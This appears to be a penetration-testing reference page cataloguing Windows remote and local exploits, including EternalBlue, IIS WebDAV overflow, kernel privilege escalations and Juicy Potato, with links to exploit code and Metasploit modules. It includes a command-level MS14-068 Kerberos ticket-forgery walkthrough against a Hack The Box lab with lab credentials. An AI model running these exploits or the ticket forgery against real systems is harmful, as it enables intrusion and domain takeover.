Windows issues

Remote Exploits¶

IIS¶

MS16-143 / CVE-2017-7269 -¶

Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2.
Allows remote code execution.
Via a long header beginning with "If: <http://" in a PROPFIND request.

Exploits: - https://www.exploit-db.com/exploits/41738 - https://github.com/gottburgm/Exploits/tree/master/CVE-2017-7269 - https://github.com/edwardz246003/IIS_exploit - exploit/windows/iis/iis_webdav_scstoragepathfromurl

References: - 0patching the "Immortal" CVE-2017-7269

SMB¶

MS17-010 - EternalBlue SMB Remote Windows Kernel Pool Corruption¶

Vista SP2, 2008 SP2, 7 SP1, 2008 R2, 8.1, 2012, 2012 R2, RT 8.1, 10, 2016
CVE-2017-0143 to CVE-2017-0148

Exploit: - https://github.com/worawit/MS17-010 - https://github.com/nixawk/labs/blob/master/MS17_010/smb_exploit.py - https://github.com/qazbnm456/awesome-cve-poc/blob/master/MS17-010.md - exploit/windows/smb/ms17_010_eternalblue

References: - https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/ - https://github.com/qazbnm456/awesome-cve-poc/blob/master/MS17-010.md - https://blog.rapid7.com/2017/05/19/metasploit-the-power-of-the-community-and-eternalblue/

Active Directory / Kerberos¶

MS14-068 (PyKEK)¶

KDC did not validate PAC checksum correctly
Can rewrite ticket to be domain admin
Internals - Request TGT with no PAC - Create a forged PAC signed with user's password hash - TGT is sent with forged PAC as the authenticator - KDS does validation - Request is for a Service Tickect with no PAC - Sees that TGT is with no PAC - Takes the forged PAC in the authenticator - Include that in a new TGT and use it for issueing Service Ticket
- Request a deligation ticket to get it woking across DCs

Detect by: - AS-REQ and TGS-REQ both containing "Include PAC:false"

Fix: - Apply KB3011780 before DCPromo

RPC¶

MS03-026 - DCOM RPC Overflow Discovered by LSD¶

Over Port - 135 Exploit: - https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS03-026

References: - https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS03-026 - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/10-years-on-a-look-back-at-ms08-067/

MS05-017¶

Exploit: - https://raw.githubusercontent.com/offensive-security/exploitdb/master/exploits/windows/remote/1075.c

MS07-029 - Microsoft DNS RPC Service extractQuotedChar() Overflow (TCP)¶

MS07-065¶

Other (Local)¶

MS17-013 - Microsoft Graphics Componen¶

Vista SP2, 2008 SP2, 7 SP1, 2008 R2, RT 8.1, 10, 2016,

Exploit: - https://www.exploit-db.com/exploits/41656

References:

MS10-061 - Windows Printer Spooler (Stuxnet)¶

XP SP2/SP3, 2003 SP2, Vista SP1/SP2, 2008, 7, 2008 R2
Execute code with SYSTEM privilege if a printer is shared on the network (patched September 2010)
Making DCE RPC request to the StartDocPrinter procedure (notifies the spooler that a new job arrived)
Impersonate the Printer Spooler service (spoolsv.exe) to create a file (from working dir: %SystemRoot%\system32)
Sending WritePrinter requests, an attacker can fully control the content of the created file
Gain code execution by writing to a directory used by WMI to deploy applications
- Wbem\Mof is periodically scanned and any new .mof files

References: - http://poppopret.blogspot.com/2011/09/playing-with-mof-files-on-windows-for.html - os/windows/wmi.md

Privilege Escalation Exploits¶

MS16-032 - Secondary Logon to Address Elevation of Privilege¶

Win7-Win10 & 2008-2012 - 32/64 bit
Machine must have 2+ CPU cores

Exploits: - https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-032 - http://willgenovese.com/ms16-032-one-liners/ - ms16_032_secondary_logon_handle_privesc

References: - https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html

MS11-080 - Ancillary Function Driver (AfdJoinLeaf)¶

XP, 2003 - 32/64 bit

Exploits: - https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS11-080 - https://www.exploit-db.com/exploits/18176 - https://hackingandsecurity.blogspot.com/2016/05/ms11-080-privilege-escalation-windows.html

python py installer module
python pyinsaller.py --onefile example.py

MS12-042 - Windows Kernel - SYSRET¶

XP SP3, 2003, 7, 2008 R2

Exploits: - https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS12-042 - https://www.exploit-db.com/exploits/20861

MS15-051 - Windows Kernel-Mode Drivers (client_copy_image)¶

2003 SP2, Vista SP2, 2008 SP2, 7 SP1, 2008 R2 SP1, 8, 8.1, 2012, 2012 R2, RT, RT 8.1 - 32/64 bit

Exploits: - https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS15-051 - https://www.exploit-db.com/exploits/37049 - https://github.com/hfiref0x/CVE-2015-1701 - exploit/windows/local/ms15_051_client_copy_image

References: - https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html

MS10-092 - Task Scheduler¶

Vista SP1/SP2, 2008, 7 2008 R2 - 32/64bit

Exploits: - https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-092 - exploit/windows/local/ms10_092_schelevator

References: - https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-092 - http://daveschull.com/wp-content/uploads/2015/05/Stuxnet_Under_the_Microscope.pdf

MS14-058 - TrackPopupMenu Win32k NULL Pointer Dereference¶

2003, Vista, 2008, 2008 R2, 8, 8.1, 2012, 2012 R2, RT, RT 8.1,

Exploits: - https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-058 - exploit/windows/local/ms14_058_track_popup_menu

References: - https://www.crowdstrike.com/blog/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/ - https://www.freebuf.com/articles/system/50110.html

MS14-070 - tcpip!SetAddrOptions NULL Pointer Dereference¶

2003 SP2

Exploits: - https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-070 - exploit/windows/local/ms14_070_tcpip_ioctl

References: - https://blog.korelogic.com/blog/2015/01/28/2k3_tcpip_setaddroptions_exploit_dev - https://korelogic.com/Resources/Advisories/KL-001-2015-001.txt

bypassuac_eventvwr¶

MS10-015 - Kitrap0d¶

MS14-068 - Kerberos Domain Privilege Escalation¶

Exploits: - Python Kerberos Exploitation Kit - https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek - The Mystery of Duqu 2.0: a sophisticated cyberespionage actor returns

apt-get install krb5-user cifs-utils rdate
# Add proper nameservers in /etc/hosts

/etc/krb5.conf

    [libdefaults]
        default_realm = HTB.LOCAL

        # The following krb5.conf variables are only for MIT Kerberos.
        kdc_timesync = 1
        ccache_type = 4
        forwardable = true
        proxiable = true

    #Edit the realms entry as follows:
    [realms]
        LAB.LOCAL = {
            kdc = mantis.htb.local:88
            admin_server = mantis.htb.local
            default_domain = HTB.LOCAL
        }

    #Also edit the final section:
    [domain_realm]
        .domain.internal = HTB.LOCAL
        domain.internal = HTB.LOCAL

net time -S 10.10.10.52 -U ""
# Set local time accordingly
# OR USE
rdate -n 10.10.10.52

python ms14-068.py -u james@htb.local -d mantis.htb.local
-p J@m3s_P@ssW0rd! -s S-1-5-21-4220043660-4019079961-2895681657

Rename the generated ticket to /tmp/krb5cc_0

mv TGT_James@HTB.local.ccache /tmp/krb5cc_0

With Impacket (Golden PAC module): - kinit james (options ?) - klist (options ?) - python goldenPac.py htb.local/james@mantis.htb.local - Entering the password for the james user

Manually:

smbclient -W HTB.LOCAL //MANTIS/c$ -k

References: - Additional information about CVE-2014-6324 - Attack Methods for Gaining Domain Admin Rights in Active Directory - HTB - Mantis

CVE-2017-0213 - COM Aggregate Marshaler/IRemUnknown2 Type Confusion Privilege Escalation¶

10, 7, 8.1, 2008, 2008 R2, 2012, 2012 R2, 2016
When accessing an OOP COM object using IRemUnknown2 the local unmarshaled proxy can be for a different interface to that requested by QueryInterface resulting in a type confusion which can result in EoP.

Exploit: - https://github.com/WindowsExploits/Exploits/tree/master/CVE-2017-0213

References: - https://bugs.chromium.org/p/project-zero/issues/detail?id=1107 - https://www.exploit-db.com/exploits/42020

MS11-013¶

Juicy Potato¶

Need SeImpersonate or SeAssignPrimaryToken (whoami /priv)
https://github.com/ohpe/juicy-potato
https://github.com/TsukiCTF/Lovely-Potato
http://ohpe.it/juicy-potato/CLSID/Windows_Server_2012_Datacenter/
Internals: Rotten Potato – Privilege Escalation from Service Accounts to SYSTEM: https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/